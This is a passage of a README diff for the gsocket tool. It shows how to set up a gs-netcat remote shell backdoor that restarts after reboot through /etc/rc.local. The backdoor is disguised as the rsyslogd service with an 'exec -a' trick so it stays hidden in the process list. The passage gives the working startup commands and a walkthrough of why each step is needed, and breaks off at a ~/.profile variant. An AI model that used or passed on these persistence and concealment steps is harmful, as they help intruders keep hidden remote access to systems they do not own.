hackerschoice/gsocket/README.md

 Combine what you have learned so far and make your backdoor restart after reboot (and as a hidden service obfuscated as *rsyslogd*).
 Use any of the start-up scripts, such as */etc/rc.local*:
 ```
 $ cat /etc/rc.local
-#! /bin/bash
+#! /bin/sh -e

-(GSOCKET_ARGS="-s MySecret -liqD" SHELL="/bin/bash" exec -a rsyslogd /usr/local/bin/gs-netcat)
+GSOCKET_ARGS="-k /root/.gs_id_sec.txt -liqD" TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd /root; exec -a rsyslogd /usr/local/bin/gs-netcat"

 exit 0
 ```
-The '(...)' brackets start a sub-shell which is then replaced (by *exec*) with gs-netcat.
-The gs-netcat process is hidden (as *rsyslogd*) from the process list.
-Set SHELL=/bin/bash to use bash instead of */bin/sh*.
-Read [how to enable rc.local](https://linuxmedium.com/how-to-enable-etc-rc-local-with-systemd-on-ubuntu-20-04/) if */etc/rc.local* does not exist.
+The environment is not fully set up the way we like it during bootup.
+Thus we set some values to make the backdoor more enjoyable (optionally): *TERM=xterm-256color* and *SHELL=/binb/bash*.
+Next the startup script (*/etc/rc.local*) uses */bin/sh* which does not support our *exec -a* trick.
+Thus we have */bin/sh* start */bin/bash* which in turn does the *exec -a* trick to start *gs-netcat*.
+Puh.
+The gs-netcat process is hidden (as *rsyslogd*) from the process list.Read [how to enable rc.local](https://linuxmedium.com/how-to-enable-etc-rc-local-with-systemd-on-ubuntu-20-04/) if */etc/rc.local* does not exist.

 Starting when the user logs in (and only once) can be done by adding this line to the user's *~/.profile* file:
 ```